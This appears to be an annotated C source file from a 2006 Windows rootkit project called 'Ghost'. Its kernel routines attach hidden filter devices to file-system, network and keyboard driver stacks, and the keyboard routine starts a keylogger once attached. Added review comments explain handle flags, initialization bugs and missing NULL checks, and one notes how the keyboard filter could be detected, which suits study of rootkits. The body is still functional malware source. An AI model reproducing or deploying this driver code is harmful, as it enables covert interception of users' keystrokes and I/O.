// filterManager
// Copyright Ric Vieler, 2006
// Attach filter devices to file, network and keyboard drivers
#include "ntddk.h"
#include "Ghost.h"
#include "filterManager.h"
#include "keyManager.h"
// insertFileFilter
// Opens the device named by deviceName, creates an unnamed device object of
// the same DeviceType and attaches it to the top of that device's stack.
// Parameters:
//   pDriverObject - driver that will own the new filter device
//   ppOldDevice   - out: the device the filter ended up attached to (the value
//                   returned by IoAttachDeviceToDeviceStack); NULL if the
//                   attach fails
//   ppNewDevice   - out: the new filter device; reset to NULL if the attach
//                   fails so that an unload does not touch a deleted object
//   deviceName    - NT object-manager path of the device to open; not
//                   validated here
// Returns STATUS_SUCCESS, the NTSTATUS of a failing ZwCreateFile /
// ObReferenceObjectByHandle / IoCreateDevice call, STATUS_ABANDONED when the
// opened file has no related device object, or STATUS_NO_SUCH_DEVICE when
// IoAttachDeviceToDeviceStack returns NULL.
// The temporary file handle and file-object reference are released on every
// exit path; the stack reference taken by the attach is held until
// removeFilter.
NTSTATUS insertFileFilter(PDRIVER_OBJECT pDriverObject,
PDEVICE_OBJECT* ppOldDevice,
PDEVICE_OBJECT* ppNewDevice,
wchar_t* deviceName)
{
NTSTATUS status;
UNICODE_STRING unicodeDeviceName;
HANDLE fileHandle;
IO_STATUS_BLOCK statusBlock = { 0 };
OBJECT_ATTRIBUTES objectAttributes = { 0 };
PFILE_OBJECT fileObject;
// Get the device for the specified drive
RtlInitUnicodeString( &unicodeDeviceName, deviceName );
// NOTE(review): OBJ_KERNEL_HANDLE is not set, so the handle opened below is
// created in the handle table of whatever process this runs in; if this can
// be called outside the System process, that process can reach the handle.
// Confirm the caller's context.
InitializeObjectAttributes( &objectAttributes,
&unicodeDeviceName,
OBJ_CASE_INSENSITIVE,
NULL,
NULL );
// FILE_ANY_ACCESS is 0 in the DDK, so the requested access is effectively
// just SYNCHRONIZE. FILE_DIRECTORY_FILE presumably opens a volume device as
// its root directory — confirm against the device names the caller passes.
status = ZwCreateFile( &fileHandle,
SYNCHRONIZE|FILE_ANY_ACCESS,
&objectAttributes,
&statusBlock,
NULL,
0,
FILE_SHARE_READ | FILE_SHARE_WRITE,
FILE_OPEN,
FILE_SYNCHRONOUS_IO_NONALERT | FILE_DIRECTORY_FILE,
NULL,
0 );
if( !NT_SUCCESS( status ) )
return status;
// ObjectType is NULL, so no type check is made on the handle; passing
// *IoFileObjectType would make this call reject a non-file handle. With
// AccessMode == KernelMode the FILE_READ_DATA access check is not enforced.
status = ObReferenceObjectByHandle( fileHandle,
FILE_READ_DATA,
NULL,
KernelMode,
(PVOID *)&fileObject,
NULL );
if( !NT_SUCCESS( status ) )
{
ZwClose( fileHandle );
return status;
}
// Device object backing the file; only valid while fileObject is referenced.
*ppOldDevice = IoGetRelatedDeviceObject( fileObject );
if( !*ppOldDevice )
{
ObDereferenceObject( fileObject );
ZwClose( fileHandle );
return STATUS_ABANDONED;
}
// Create a new device
// Unnamed, non-exclusive, no device extension, same DeviceType as the target.
status = IoCreateDevice( pDriverObject,
0,
NULL,
(*ppOldDevice)->DeviceType,
0,
FALSE,
ppNewDevice );
if( !NT_SUCCESS( status ) )
{
ObDereferenceObject( fileObject );
ZwClose( fileHandle );
return status;
}
// Initialize the new device
// Mirror the I/O transfer type and the secure-open characteristic of the
// device below so requests are built the same way for both.
if( (*ppOldDevice)->Flags & DO_BUFFERED_IO )
(*ppNewDevice)->Flags |= DO_BUFFERED_IO;
if( (*ppOldDevice)->Flags & DO_DIRECT_IO )
(*ppNewDevice)->Flags |= DO_DIRECT_IO;
if( (*ppOldDevice)->Characteristics & FILE_DEVICE_SECURE_OPEN )
(*ppNewDevice)->Characteristics |= FILE_DEVICE_SECURE_OPEN;
// NOTE(review): DO_DEVICE_INITIALIZING is never cleared on *ppNewDevice here
// (insertKeyboardFilter does clear it); the I/O manager only clears it for
// devices created during DriverEntry — confirm where this routine is called.
// Attach the new device to the old device
// The commented-out _Safe variant returns a status and stores the lower
// device atomically; the call used instead returns NULL on failure, and the
// stack may change between IoGetRelatedDeviceObject above and this attach.
// status = IoAttachDeviceToDeviceStackSafe( *ppNewDevice, *ppOldDevice, ppOldDevice );
*ppOldDevice = IoAttachDeviceToDeviceStack( *ppNewDevice, *ppOldDevice );
if( *ppOldDevice == NULL )
{
// Prevent unload if load failed
IoDeleteDevice( *ppNewDevice );
*ppNewDevice = NULL;
// Clean up and return error
ObDereferenceObject( fileObject );
ZwClose( fileHandle );
return STATUS_NO_SUCH_DEVICE;
}
ObDereferenceObject( fileObject );
ZwClose( fileHandle );
return STATUS_SUCCESS;
}
// insertNetworkFilter
// Creates an unnamed FILE_DEVICE_UNKNOWN device and attaches it by name to
// the device called deviceName.
// Parameters:
//   pDriverObject - driver that will own the new filter device
//   ppOldDevice   - out: the device the filter is attached to, as stored by
//                   IoAttachDevice; its value after a failed attach should
//                   not be relied on
//   ppNewDevice   - out: the new filter device; reset to NULL if the attach
//                   fails
//   deviceName    - NT object-manager path of the target device
// Returns the NTSTATUS of IoCreateDevice or IoAttachDevice.
NTSTATUS insertNetworkFilter(PDRIVER_OBJECT pDriverObject,
PDEVICE_OBJECT* ppOldDevice,
PDEVICE_OBJECT* ppNewDevice,
wchar_t* deviceName)
{
NTSTATUS status = STATUS_SUCCESS;
UNICODE_STRING unicodeName = { 0 };
// Create a new device
// Exclusive == TRUE here (only one open handle at a time on the filter
// device); the keyboard filter passes FALSE.
status = IoCreateDevice( pDriverObject,
0,
NULL,
FILE_DEVICE_UNKNOWN,
0,
TRUE,
ppNewDevice );
if( !NT_SUCCESS( status ) )
return status;
// Initialize the new device
// The cast is redundant: *ppNewDevice is already a PDEVICE_OBJECT.
// NOTE(review): DO_DEVICE_INITIALIZING is not cleared here, unlike in
// insertKeyboardFilter — confirm this is only called from DriverEntry.
((PDEVICE_OBJECT)(*ppNewDevice))->Flags |= DO_DIRECT_IO;
// Attach the new device
RtlInitUnicodeString( &unicodeName, deviceName );
// Attaches to the top of the named device's stack; the device attached to is
// written to *ppOldDevice.
status = IoAttachDevice( *ppNewDevice,
&unicodeName,
ppOldDevice );
// Prevent unload if load failed
if( !NT_SUCCESS( status ) )
{
IoDeleteDevice( *ppNewDevice );
*ppNewDevice = NULL;
}
return status;
}
// insertKeyboardFilter
// Creates an unnamed FILE_DEVICE_KEYBOARD device, attaches it by name to the
// device called deviceName and, on success, calls StartKeylogger.
// Parameters:
//   pDriverObject - driver that will own the new filter device; also passed
//                   on to StartKeylogger
//   ppOldDevice   - out: the device the filter is attached to, as stored by
//                   IoAttachDevice
//   ppNewDevice   - out: the new filter device; reset to NULL if the attach
//                   fails
//   deviceName    - NT object-manager path of the keyboard device
// Returns the NTSTATUS of IoCreateDevice or IoAttachDevice; whatever
// StartKeylogger returns, if anything, is not checked.
// Defensive note: the filter device is not concealed — it stays linked into
// the keyboard device stack above the named device, so walking that stack
// shows an extra device owned by this driver.
NTSTATUS insertKeyboardFilter(PDRIVER_OBJECT pDriverObject,
PDEVICE_OBJECT* ppOldDevice,
PDEVICE_OBJECT* ppNewDevice,
wchar_t* deviceName)
{
NTSTATUS status = STATUS_SUCCESS;
UNICODE_STRING unicodeName = { 0 };
// Create a new device
status = IoCreateDevice( pDriverObject,
0,
NULL,
FILE_DEVICE_KEYBOARD,
0,
FALSE,
ppNewDevice );
if( !NT_SUCCESS( status ) )
return status;
// Initialize the new device
// Buffered I/O plus DO_POWER_PAGABLE; the casts are redundant since
// *ppNewDevice is already a PDEVICE_OBJECT.
((PDEVICE_OBJECT)(*ppNewDevice))->Flags |= (DO_BUFFERED_IO | DO_POWER_PAGABLE);
// Cleared explicitly, so this routine works even when called after
// DriverEntry has returned (the other two insert routines do not do this).
((PDEVICE_OBJECT)(*ppNewDevice))->Flags &= ~DO_DEVICE_INITIALIZING;
// Attach the new device
RtlInitUnicodeString( &unicodeName, deviceName );
status = IoAttachDevice( *ppNewDevice,
&unicodeName,
ppOldDevice );
// Prevent unload if load failed
if( !NT_SUCCESS( status ) )
{
IoDeleteDevice( *ppNewDevice );
*ppNewDevice = NULL;
}
else
{
// Prepare the keylogging thread
// StartKeylogger is presumably declared in keyManager.h; its result is
// ignored, so a failure there is not reported to the caller.
StartKeylogger( pDriverObject );
}
return status;
}
// removeFilter
// Detaches a filter device from the device below it, then deletes it.
// Parameters:
//   ppOldDevice - device the filter was attached to, as returned by one of
//                 the insert routines
//   ppNewDevice - the filter device to delete
// The order is required: the device must be detached before it is deleted.
// NOTE(review): there is no NULL check. The insert routines set *ppNewDevice
// to NULL when the attach fails (insertFileFilter also leaves *ppOldDevice
// NULL), so calling this after a failed insert passes NULL to
// IoDetachDevice/IoDeleteDevice. Neither pointer is reset afterwards, so a
// second call would operate on an already-deleted device object.
void removeFilter(PDEVICE_OBJECT* ppOldDevice,
PDEVICE_OBJECT* ppNewDevice)
{
IoDetachDevice( *ppOldDevice );
IoDeleteDevice( *ppNewDevice );
}